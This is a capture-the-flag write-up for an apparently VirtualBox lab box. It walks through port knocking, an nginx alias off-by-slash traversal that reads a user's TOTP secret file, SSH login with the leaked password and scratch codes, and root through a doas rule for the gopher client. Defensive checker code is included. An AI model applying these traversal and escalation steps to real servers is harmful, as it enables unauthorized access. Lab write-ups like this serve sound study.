The target machine's IP is 192.168.56.122

Port scanning

sudo nmap --min-rate 10000 -p- 192.168.56.122
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 13:52 UTC
Nmap scan report for 192.168.56.122 (192.168.56.122)
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
70/tcp open gopher
80/tcp filtered http
MAC Address: 08:00:27:B7:3C:BC (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.27 seconds
sudo nmap -sT -sV -sC -O -p22,70,80 192.168.56.122
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 13:55 UTC
Nmap scan report for 192.168.56.122 (192.168.56.122)
Host is up (0.00031s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c9:ce:d7:2a:f9:48:25:65:a9:33:4b:d5:01:e1:2c:52 (RSA)
| 256 7e:3d:4d:b4:82:0b:13:eb:db:50:e3:60:70:f0:4a:ad (ECDSA)
|_ 256 7f:9d:13:c8:7b:d9:37:1d:cb:ff:e9:ce:f5:90:c3:32 (ED25519)
70/tcp open http pygopherd web-gopher gateway
|_http-title: Gopher
| gopher-ls:
|_[txt] /howtoconnect.txt "Connection"
80/tcp filtered http
MAC Address: 08:00:27:B7:3C:BC (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.32 seconds

Port 80 is not open (filtered), while port 70 serves Gopher, an internet protocol that predates HTTP. Browsing port 70 turns up nothing special beyond the /howtoconnect.txt listed in the scan above, which contains:

Ping us to: 4767 2343 3142

A blind guess: these are the port-knocking sequence numbers.

knock 192.168.56.122 4767 2343 3142

Getshell

A second nmap scan shows that port 80 is now open.

On port 80, robots.txt points to /nginx_backup.txt, which contains:

server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
}

server {
    server_name henry.eighty.hmv;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    location /web {
        alias /home/henry/web/;
    }
}

server {
    server_name susan.eighty.hmv;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    location /web {
        alias /home/susan/web/;
    }
}

Add henry.eighty.hmv, susan.eighty.hmv and eighty.hmv to /etc/hosts; scanning found no other virtual hosts.

Since /web is aliased into the users' home directories, try directory enumeration:

gobuster dir -u http://susan.eighty.hmv/web/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,zip,sql,txt,php,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://susan.eighty.hmv/web/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,rar,zip,sql,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

/index.html (Status: 200) [Size: 40]
/lostpasswd.txt (Status: 200) [Size: 50]

Contents of /lostpasswd.txt:

8ycrois-tu0 + /home/susan/secret/.google-auth.txt

Because the nginx location is written as /web rather than /web/ while the alias ends with a slash, nginx replaces the matched prefix with the alias literally and without a path-boundary check, so a request for /web../ maps to /home/susan/web/../ and escapes the aliased directory (the alias "off-by-slash" traversal).
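To make the mechanism concrete, here is an added example (my code, not part of the original write-up or of nginx): a small checker that flags prefix locations served by `alias` whose prefix lacks a trailing slash, run against a constructed copy of the susan server block and against the same block with `location /web/`, plus a helper that mimics how nginx turns a request URI into a filesystem path under an alias. The sample configs are constructed for this example.

```python
import posixpath
import re
from typing import List, Optional, Tuple

# Constructed samples (not taken from the target): the susan server block as
# recovered from nginx_backup.txt, and the same block with the location prefix
# given a trailing slash so that it matches the trailing slash of the alias.
VULNERABLE_CONF = """
server {
    server_name susan.eighty.hmv;
    root /var/www/html;
    location / {
        try_files $uri $uri/ =404;
    }
    location /web {
        alias /home/susan/web/;
    }
}
"""

FIXED_CONF = VULNERABLE_CONF.replace("location /web {", "location /web/ {")

# location [modifier] prefix {
LOCATION_RE = re.compile(r"\blocation\s+(?:(=|~\*?|\^~)\s+)?(\S+)\s*\{")


def _block_body(conf: str, start: int) -> str:
    """Return the text between the brace opened just before `start` and its match."""
    depth, i = 1, start
    while i < len(conf) and depth:
        if conf[i] == "{":
            depth += 1
        elif conf[i] == "}":
            depth -= 1
        i += 1
    return conf[start:i - 1]


def find_alias_traversal(conf: str) -> List[Tuple[str, str]]:
    """Flag prefix locations served by `alias` whose prefix has no trailing slash.

    nginx substitutes the alias for the matched prefix literally, so with
    `location /web` and `alias /home/susan/web/` a URI of /web../ becomes
    /home/susan/web/../ and escapes the aliased directory.
    """
    findings = []
    for m in LOCATION_RE.finditer(conf):
        modifier, prefix = m.group(1), m.group(2)
        if modifier:  # exact (=) and regex (~) locations are a different case
            continue
        body = _block_body(conf, m.end())
        alias = re.search(r"\balias\s+([^;]+);", body)
        if alias and not prefix.endswith("/"):
            findings.append((prefix, alias.group(1).strip()))
    return findings


def resolve_alias(prefix: str, alias: str, request_uri: str) -> Optional[str]:
    """Mimic how nginx maps a URI under an alias location to a filesystem path.

    Returns None when the URI does not match the prefix (nginx would then fall
    through to another location). The result is normalised the way the kernel
    resolves '..', which is what makes the off-by-slash traversal work.
    """
    if not request_uri.startswith(prefix):
        return None
    return posixpath.normpath(alias + request_uri[len(prefix):])


if __name__ == "__main__":
    print(find_alias_traversal(VULNERABLE_CONF))  # [('/web', '/home/susan/web/')]
    print(find_alias_traversal(FIXED_CONF))       # []
    print(resolve_alias("/web", "/home/susan/web/", "/web../secret/.google-auth.txt"))
    print(resolve_alias("/web/", "/home/susan/web/", "/web../secret/.google-auth.txt"))
```

The fix the checker points at is to give the prefix and the alias matching trailing slashes (`location /web/ { alias /home/susan/web/; }`); with that, `/web../` no longer matches the location and falls through to the default `root`, where it 404s. Serving user home directories through the web root at all is the deeper problem.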

Visit http://susan.eighty.hmv/web../secret/.google-auth.txt

2GN7KARBONVR55R7SP3UZPN3ZM
" RATE_LIMIT 3 30
" WINDOW_SIZE 17
" DISALLOW_REUSE
" TOTP_AUTH
71293338
48409754
27074208
60216448
17908010

Asked ChatGPT about it; this appears to be a TOTP authentication mechanism.

Tried SSH as susan: after giving 8ycrois-tu0 as the password and then 71293338 as the Verification code, the login succeeded (it seems any one of the listed codes works each time).
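For context on what that file is, here is an added example (my code, not from the write-up or from the google-authenticator project) that parses the layout of a google-authenticator secret file and implements RFC 4226 HOTP / RFC 6238 TOTP over it, checked against the RFC test vectors. The sample file is constructed: its options mirror the recovered file, but the secret is the RFC test key "12345678901234567890" in base32 and the scratch codes are dummies, not the values from the target. The point for a defender is that the file is the second factor: whoever can read it can produce valid codes, and the 8-digit lines are single-use emergency codes, so it must never sit under anything a web server can reach.

```python
import base64
import hashlib
import hmac
import struct
from typing import Dict

# Constructed sample in the layout of a google-authenticator secret file
# (~/.google_authenticator): base32 secret, option lines prefixed with '" ',
# then one-time emergency scratch codes. The secret is the RFC 4226/6238 test
# key "12345678901234567890" in base32, NOT the value recovered from the target.
SAMPLE_FILE = """GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ
" RATE_LIMIT 3 30
" WINDOW_SIZE 17
" DISALLOW_REUSE
" TOTP_AUTH
11111111
22222222
"""


def parse_google_auth(text: str) -> Dict[str, object]:
    """Split a google-authenticator file into secret, options and scratch codes."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    secret, options, scratch = lines[0], {}, []
    for ln in lines[1:]:
        if ln.startswith('" '):
            name, *args = ln[2:].split()
            options[name] = args
        elif ln.isdigit():
            scratch.append(ln)  # 8-digit single-use emergency codes
    return {"secret": secret, "options": options, "scratch_codes": scratch}


def hotp(secret_b32: str, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    # google-authenticator stores the secret without '=' padding; restore it.
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret_b32: str, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with the counter derived from the 30-second time step."""
    return hotp(secret_b32, int(unix_time) // step, digits)


def verify_totp(secret_b32: str, code: str, unix_time: int,
                window: int = 1, step: int = 30) -> bool:
    """Accept a code from the current step or up to `window` steps either side,
    comparing in constant time (a small window absorbs clock skew)."""
    counter = int(unix_time) // step
    return any(hmac.compare_digest(hotp(secret_b32, counter + d), code)
               for d in range(-window, window + 1))


if __name__ == "__main__":
    parsed = parse_google_auth(SAMPLE_FILE)
    print(parsed["options"], parsed["scratch_codes"])
    print(hotp(parsed["secret"], 0))   # 755224 (RFC 4226 test vector, counter 0)
    print(totp(parsed["secret"], 59))  # 287082 (RFC 6238 T=59 vector, 6 digits)
```

The `RATE_LIMIT 3 30` and `WINDOW_SIZE 17` lines are PAM module options (at most 3 attempts per 30 seconds; accept codes from a window of 17 steps), and `DISALLOW_REUSE` is what makes each scratch code and each time-step code usable only once.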

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-rwsr-xr-x 1 root root 42456 Apr 7 2021 /usr/local/bin/doas
-rwxr-sr-x 1 root shadow 39616 Feb 14 2019 /usr/sbin/unix_chkpwd
-rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
-rwxr-sr-x 1 root tty 34896 Jan 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root shadow 71816 Jul 27 2018 /usr/bin/chage
-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
-rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
-rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
-rwxr-sr-x 1 root ssh 321672 Jan 31 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mail 18944 Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root crontab 43568 Oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31000 Jul 27 2018 /usr/bin/expiry
-rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount

Privilege escalation

There is a /usr/local/bin/doas binary, a lightweight sudo-like privilege delegation tool.

find / -name "*doas*" 2>/dev/null
/usr/local/etc/doas.conf
/usr/local/share/man/man1/doas.1
/usr/local/share/man/man8/vidoas.8
/usr/local/share/man/man5/doas.conf.5
/usr/local/bin/vidoas
/usr/local/bin/doas
cat /usr/local/etc/doas.conf
permit nolog susan as root cmd gopher

So user susan may run the gopher command as root.

doas -u root gopher localhost 70

Once inside the gopher client, typing "!" drops to a root SHELL!!
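As an added example (my code, not from the write-up or from the doas project), here is a small audit of doas.conf rules that flags the shape of the rule found on the target: a `cmd` with no `args` clause (so any arguments are allowed) and `nolog` (so successful escalations leave no syslog record). The sample config is constructed; the `alice` rule is a placeholder added for contrast and is not on the target. The parser covers the `permit|deny [options] identity [as target] [cmd command [args ...]]` form and does not handle `setenv { ... }` blocks, which is an assumption of this example.

```python
import shlex
from typing import Dict, List

# Constructed doas.conf: the rule found on the target plus one looser rule added
# for contrast. "alice" is a placeholder name, not a user on the target.
DOAS_CONF = """
# doas.conf syntax: permit|deny [options] identity [as target] [cmd command [args ...]]
permit nolog susan as root cmd gopher
permit nopass alice
"""

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}


def parse_doas_rules(text: str) -> List[Dict[str, object]]:
    """Parse doas.conf rules (without setenv blocks) into dicts."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        toks = shlex.split(line)
        # Without an "as" clause doas targets root, so that is the default here.
        rule = {"action": toks[0], "options": [], "identity": None,
                "target": "root", "cmd": None, "args": None}
        i = 1
        while toks[i] in OPTIONS:
            rule["options"].append(toks[i])
            i += 1
        rule["identity"] = toks[i]
        i += 1
        while i < len(toks):
            if toks[i] == "as":
                rule["target"] = toks[i + 1]
                i += 2
            elif toks[i] == "cmd":
                rule["cmd"] = toks[i + 1]
                i += 2
            elif toks[i] == "args":
                rule["args"] = toks[i + 1:]  # empty list = command takes no arguments
                break
            else:
                i += 1
        rules.append(rule)
    return rules


def audit_doas(rules: List[Dict[str, object]]) -> List[str]:
    """Report permit rules whose scope or logging a reviewer should question."""
    findings = []
    for r in rules:
        if r["action"] != "permit":
            continue
        who, tgt = r["identity"], r["target"]
        if r["cmd"] is None:
            findings.append(f"{who}: may run ANY command as {tgt}")
        elif r["args"] is None:
            findings.append(f"{who}: may run {r['cmd']} as {tgt} with ANY arguments")
        if "nopass" in r["options"]:
            findings.append(f"{who}: nopass, no re-authentication before escalation")
        if "nolog" in r["options"]:
            findings.append(f"{who}: nolog, successful escalations leave no syslog record")
    return findings


if __name__ == "__main__":
    for finding in audit_doas(parse_doas_rules(DOAS_CONF)):
        print(finding)
```

Pinning `args` narrows the rule but, as the write-up shows, does not help when the permitted program is an interactive client that can hand the user a shell; the reviewer question for any `cmd` rule is whether the program itself can spawn one. Dropping `nolog` at least leaves an audit trail of each use.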

Afterthoughts

Got to know the rather ancient Gopher protocol, the directory traversal caused by the nginx configuration, and doas.